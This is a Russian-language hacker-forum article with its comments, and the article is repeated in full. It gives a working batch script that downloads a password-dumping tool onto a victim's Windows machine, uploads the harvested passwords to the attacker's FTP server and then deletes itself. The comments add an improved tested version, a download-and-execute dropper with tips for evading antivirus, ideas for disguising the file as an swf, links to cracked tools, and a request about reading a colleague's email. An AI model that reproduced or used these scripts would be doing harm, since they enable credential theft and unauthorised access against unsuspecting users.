Всем привет!
В этой статье вы узнаете, как можно получить пароли жертв через bat файл, и как от этого защитится, если уже знаете, можете не читать.
Начнем! ;)

Для начала нам понадобится обычный текстовый редактор, я воспользуюсь обычным блокнотом (Пуск->Выполнить->notepad), запускаем. Так теперь нам надо скачать программку PassView Pro (обычная версия не подойдет, только pro), скачать мы ее можем здесь (http://www.sendspace.com/file/5oxcbr). Скачали, теперь переименуйте её, например у меня будет “passexport.exe”. Давайте создадим папку(где хотите), у меня она будет находится “c:\temp”. Создали? Теперь кидаем туда “passexport.exe” (PassView Pro).
Дальше нам надо скачать ftp сервер, я возьму “Pablo’s ftp server”, на мой взгляд он простенький, и полностью подходит для этого дела. Качаем его отсюда (http://www.sendspace.com/file/zmfjep), у меня он будет находится в “c:\ftp”. Теперь надо настроить его. Запускаем ftpserver.exe, жмем вкладку “server”, выбираем там “User Account Wizard”. В поле “account name” пишем “ftpuser”, жмем “далее”. В поле “password” напишем “12345” и повторим это в поле “confirm password”, теперь жмем “далее”. Теперь нам надо указать папку, которая будет открыта этому пользователю, я создавал в диске c:\, указываю “c:\temp”, жмём “далее”. Отмечаем галочки “Allow Download”, “Allow Upload”, жмем далее и готово! Все, настройка фтп сервера закончена! Теперь нам понадобится текстовый редактор, он у нас уже открыт. Пишем в него:

@echo off
Echo open xxx.xxx.xxx.xxx>go.txt&&echo ftpuser>>go.txt&&echo 12345>>go.txt&&echo get passexport.exe>>go.txt&&echo bye>>go.txt
Echo open xxx.xxx.xxx.xxx>send.txt&&echo ftpuser>>send.txt&&echo 12345>>send.txt&&echo send pass.txt>>send.txt&&echo bye>>send.txt
ftp -s:go.txt > nul
passexport.exe pass.txt
ftp -s:send.txt > nul
del go.txt send.txt passexport.txt pass.txt name.bat

Теперь я объясню каждую делать этого кода.
xxx.xxx.xxx.xxx - IP фтп сервера
Echo – записывает текст
> - указывает какой файл создать
>> - в какой дописать
&& - тоже самое, что запитая в русском языке =)
ftp – фтп клиент встроенный в windows
-s: - открывает сценарий
del go.txt send.txt passexport.txt pass.txt name.bat - это строчка указывает, какие файлы удалить после запуска файла, она удалит все за собой, в том числе и себя. (измените name.bat на свое название, когда вы сохраните в .bat файл)
> nul – скрывает записи от пользовательских глаз

Сохраняем в name.bat и даем жертве! после того как жертва запустит этот файл, к вам в папку, которую вы указали для пользователя, в настройках фтп, прейдет текстовый файл с паролями(в статье я указывал c:\temp).

Вот вроде и все! Что бы уберечь себя от таких приколов, просматривайте код .bat файла, прежде чем его запускаете.
Статья предназначена для ознакомительных целей, за последствия не отвечаю!

Авторские права принадлежат modest, 12.10.06. (modest@xaker.ru)

Вот вроде и все! Что бы уберечь себя от таких приколов, просматривайте код .bat файла, прежде чем его запускаете.

отличный способ ниче не скажешь - более менее разумный чел сразу узнает твой ip :)..
это прокатит только с лохами про файрволл ниче не слыхавшими..

Хм.....не проверял ,но молодец ! ;)

отличный способ ниче не скажешь - более менее разумный чел сразу узнает твой ip :)..
это прокатит только с лохами про файрволл ниче не слыхавшими..
А ты укажи не свой ип=) чужой фтп сервер.
Я проверял с включенным firewall, ниче не "вякал".

Это вигня полная на самом деле.Тока полные ламеры могут сохранять свои пароли.

К примеру файрволл OUTPOST попалит и выдаст окно для того что спросить разрешиние на конект с xxxx.ru! Попройбу у себе на компе! Если у тебя OUTPOST

А ты укажи не свой ип=) чужой фтп сервер.
так уже лучше =), надо было про это написать в статье, представь, сколько начинающих может спалиться, последуй они описанным в твоей статье действиям =)..
Я проверял с включенным firewall, ниче не "вякал".
ну это у тебя так настроено, по хорошему, не стоит разрешать встроенному виндовому фтп-клиенту свободно выходить в сеть, если это действительно не необходимо (а кому это необходимо, а?)..

Я наверно тупой :)
А какие пароли он тырит ? От чего ?

Стучал недавно один мyдак с такой фигней... зашел на фтп там сайт какой то "hack team" был...

Я наверно тупой :)
А какие пароли он тырит ? От чего ?
От инета

Статья классная, мне понравилось! +

Напоминает Богом забытое видео об использовании kaht'a .
Плесень.

так уже лучше =), надо было про это написать в статье, представь, сколько начинающих может спалиться, последуй они описанным в твоей статье действиям =)..

ну это у тебя так настроено, по хорошему, не стоит разрешать встроенному виндовому фтп-клиенту свободно выходить в сеть, если это действительно не необходимо (а кому это необходимо, а?)..
Это для ознакомительных целей=)

мдя...............велик изобрел=)))))юзайте kaht, дыра старая-старая, но и ламов не мало!!!и юзать приятней!=)да и вообще спосбов замутить инета-ПРЕСС!!!самое плохое-то, что после пары часов хал. инета, хз скоко часов сидишь и смотришь на дядь в погонах=)

Напоминает Богом забытое видео об использовании kaht'a .
Плесень.
А мне это напомнило статью из Хакера, по моему 2002 года, или 2000, "Как раздобыть халявного инета" способ 4:Расшаренные ресурсы=))))))))))))))))))))))))))))))))))) ) :D

если можно дайте ссылочку поновей на пассвью про-версии, плиз..

А я вот год назад тырил инет с помощью радмина и Dialupass, рекорд 30 акаунтов за сутки. Если хотите там есть даже видео с Радмином на ачате, автора не помню, но чел дал пищу для размышления!

Жаль, но данный метод (да и Кахт2) почти неактуален. Точнее, у лохов тырить нечего, а серьёзных людей так кинуть трудно.
За идею "+" дам.

Всмысле эту статью по другому можно назвать "как создать троя", я правильно понял?

Рельная статья мне нравится

2modest
Слухай, все сделал как тут написано - не пашет. В папке с passexport.exe ничего не появляется... Че-то тут не так. Зачем мы переименовывали PassView Pro если мы им нигде не пользуемся??

Только что пробовал - сработало отлично. Коррективы правда внесни пришлось.
REM Отключаем вывод сообщений в консоли:
@echo off
REM Создаём сценарий закачки "экспортёра паролей" на комп жертвы с нашего ФТП-сервера:
Echo open 10.10.10.10>go.txt&&echo asdf>>go.txt&&echo 12345>>go.txt&&echo get PVP.exe>>go.txt&&echo bye>>go.txt
REM Создаём сценарий для отправки паролей жертвы на наш ФТП-сервер:
Echo open 10.10.10.10>send.txt&&echo asdf>>send.txt&&echo 12345>>send.txt&&echo send pass.txt>>send.txt&&echo bye>>send.txt
REM Запускаем встроенный ФТП-клиент по первому сценарию (скачать программу):
ftp -s:go.txt>nul
REM Запускаем "экспортёр паролей" для экспорта в файл pass.txt:
PVP.exe pass.txt
REM Запускаем встроенный ФТП-клиент по второму сценарию (отправить пароли):
ftp -s:send.txt>nul
REM Удаляем все созданные нами файлы (сценарии, экспортёр, пароли, сам батник):
del go.txt send.txt PVP.exe pass.txt Exec.batЕсли что не так, извиняйте. Хотел внести побольше ясности.
Адрес ФТП-сервера, логин и пароль ставьте свои. Файлы тоже называйте как хочется.
Самое главное - проверяйте PassView (PVP.exe) на умение делать экспорт. А то мне часто попадались "кастраты", выдаваемые за PRO.

Статья ничё так, но спалиться мона нефиг делать...Лучше ужо пинч криптованный кинуть, вот его не спалит фаервол...

Интерресно и нах нам пароли от его инета....Если умелыми руками и инет итак халява.... Ну а так Ламеру ламера въепать,,,,... И то у ламера на это и мозгов не хватит..)

Ну так тока лохов разводить, у них ценного нет ничего, вот тока если присабачить к этому батнику нестандартную иконку, типа swf ФАЙЛА, то у многих в винде отключен показ расширенний, и положив батник в папку с swf роликами можно поживиться интересненьким, а на запрос outpost ? ну назовем game online файл мож и перец подумает что swf конектиться к серверу.

ерунда полная, к тому же и прожу ету пасс вью про уже не найти ни где.
не ну падход канешно интересный для 2006 года,
но...

паповоду паследнего поста, зачем все усложнять, сразу ехе отослать по типу ICq2008.eXe прого вроде квик батч компилятор...

хм.. ничё так статья.. но фаер запалит ..

извиняйте, за ап, но "статья" на статью не тянет, ибо может и было это актуально в 1995.. :)

Ну метод явно интерестный но хочу у автра спросить - тебя не смущает что дос окно выскакивает? троха паливно ето ...

modest + за изобретательность неподскажеш где найти учебники по bat програмированию? ведь можно что то посерьёзнее сделать. например открыть фтп на компе жертвы как это делает прога ftp pablo и передать настройки этого фтп на наш сниф скажем и получиться уже бэкдур))

Uploader & Exec на bat'e :)

Создаем бат-файл, с этим кодом:
@echo off
echo open ftp.server.com >ftp.bif
rem Login | Passwd
echo user user pass >>ftp.bif
echo binary >>ftp.bif
echo get "file.exe" "%SYSTEMROOT%/temp/file.exe" >>ftp.bif
echo bye >>ftp.bif
ftp -v -i -n -a -s:ftp.bif
%SYSTEMROOT%/temp/file.exe

Затем заюзаем Bat_To_Exe_Converter (http://rapidshare.com/files/101609846/Bat_To_Exe_Converter.exe.html).
И аплойдер готов! Антивирусам не палится.

Да норм идейка)

Фух нашол))
если надо комуто то качайте...
PasswordsPro 2.4.1.0 (http://rapidshare.com/files/103829725/%3Cbr%20/%3EPasswordsPro_2.4.1.0_regged.rar.html)
PasswordsPro 2.4.2.1 (http://rapidshare.com/files/103833777/PasswordsPro.2.4.2.1.rar.html)

идейка гуд)) воплотить бы(

Фигня это всё в висте встроенный файервол палит всё, и дефендер недолюбливает пассвиевер.

Интересная статья, попрошу выложить еще раз PassView Pro ссылка не рабочая

Да, статья хорошая, только на PassViev Pro ссылка битая. Там написано что нужен именно Pro, обычный неподойдёт, Pro в гугле никак не ищет. Да и не только в гугле! Скачал обычный, а с обычным и правда ничё не работает =)))))

modest + за изобретательность неподскажеш где найти учебники по bat програмированию? ведь можно что то посерьёзнее сделать. например открыть фтп на компе жертвы как это делает прога ftp pablo и передать настройки этого фтп на наш сниф скажем и получиться уже бэкдур))
Это не язык программирование, а написание скриптов под командную оболочку.
У тебя получится не backdoor, а обычный доступ к FTP. Если отбросить все скептические рассуждения по этому поводу, то только если у тебя будет доступ к %SystemRoot%/Windows/ , ещё что-то придумать в дальнейшем можно. Но это бредовое исполнение, ничего путного не даст.

Открывать соединение к FTP - уже палевно =) как никогда.

P.S.: Хотя, по прочтению "таких" статей, ИМХО 'мальчики' <12 задумываются стать хэккерами.

А на мой взгляд метод фтп давно устарел и очень легко палитса.

Этот способ точно не прокатит если чел не конченый ламер.
Включённый фаер да если ещё виста стоять будет. Забудь как о сладком сексе с голливудской звездой :d

Что за тупость! Что ламер сделает с моим айпи ???

Всем привет!
В этой статье вы узнаете, как можно получить пароли жертв через bat файл, и как от этого защитится, если уже знаете, можете не читать.
Начнем! ;)

Для начала нам понадобится обычный текстовый редактор, я воспользуюсь обычным блокнотом (Пуск->Выполнить->notepad), запускаем. Так теперь нам надо скачать программку PassView Pro (обычная версия не подойдет, только pro), скачать мы ее можем здесь (http://www.sendspace.com/file/5oxcbr). Скачали, теперь переименуйте её, например у меня будет “passexport.exe”. Давайте создадим папку(где хотите), у меня она будет находится “c:\temp”. Создали? Теперь кидаем туда “passexport.exe” (PassView Pro).
Дальше нам надо скачать ftp сервер, я возьму “Pablo’s ftp server”, на мой взгляд он простенький, и полностью подходит для этого дела. Качаем его отсюда (http://www.sendspace.com/file/zmfjep), у меня он будет находится в “c:\ftp”. Теперь надо настроить его. Запускаем ftpserver.exe, жмем вкладку “server”, выбираем там “User Account Wizard”. В поле “account name” пишем “ftpuser”, жмем “далее”. В поле “password” напишем “12345” и повторим это в поле “confirm password”, теперь жмем “далее”. Теперь нам надо указать папку, которая будет открыта этому пользователю, я создавал в диске c:\, указываю “c:\temp”, жмём “далее”. Отмечаем галочки “Allow Download”, “Allow Upload”, жмем далее и готово! Все, настройка фтп сервера закончена! Теперь нам понадобится текстовый редактор, он у нас уже открыт. Пишем в него:

@echo off
Echo open xxx.xxx.xxx.xxx>go.txt&&echo ftpuser>>go.txt&&echo 12345>>go.txt&&echo get passexport.exe>>go.txt&&echo bye>>go.txt
Echo open xxx.xxx.xxx.xxx>send.txt&&echo ftpuser>>send.txt&&echo 12345>>send.txt&&echo send pass.txt>>send.txt&&echo bye>>send.txt
ftp -s:go.txt > nul
passexport.exe pass.txt
ftp -s:send.txt > nul
del go.txt send.txt passexport.txt pass.txt name.bat

Теперь я объясню каждую делать этого кода.
xxx.xxx.xxx.xxx - IP фтп сервера
Echo – записывает текст
> - указывает какой файл создать
>> - в какой дописать
&& - тоже самое, что запитая в русском языке =)
ftp – фтп клиент встроенный в windows
-s: - открывает сценарий
del go.txt send.txt passexport.txt pass.txt name.bat - это строчка указывает, какие файлы удалить после запуска файла, она удалит все за собой, в том числе и себя. (измените name.bat на свое название, когда вы сохраните в .bat файл)
> nul – скрывает записи от пользовательских глаз

Сохраняем в name.bat и даем жертве! после того как жертва запустит этот файл, к вам в папку, которую вы указали для пользователя, в настройках фтп, прейдет текстовый файл с паролями(в статье я указывал c:\temp).

Вот вроде и все! Что бы уберечь себя от таких приколов, просматривайте код .bat файла, прежде чем его запускаете.
Статья предназначена для ознакомительных целей, за последствия не отвечаю!

Авторские права принадлежат modest, 12.10.06. (modest@xaker.ru)

Перезалейте плиз, кто-нить на DepositFiles.com, заранее спс!

Вопрос (тока не бейте): есть у нужного человека из локалки(нужны его письма) в програмс файлс папка the bat,скопировал её,заменил свою в програмс файлс,клацаю на значёк бата на раб столе и ... открываюццо мои почтовые ящики..
Итак,как себе поставить бат моего обьекта локалки? Читал,что для инстала бата нужно скопировать ещё веточку реестра [HKEY_CURRENT_USER\Software\RIT],как я это смогу сделать на его железе?
И вообще,что ещё нужно,какие танцы?
Спаcибо

фигня и автор не ты, в хак роликах много таких способов, так что не выдумывай =)

дык чтоб фтп сервер подянть на своем компе -нужен выделеенный ip -иначе никто не достучиться

Что за тупость! Что ламер сделает с моим айпи ???

Ментозаврам напишет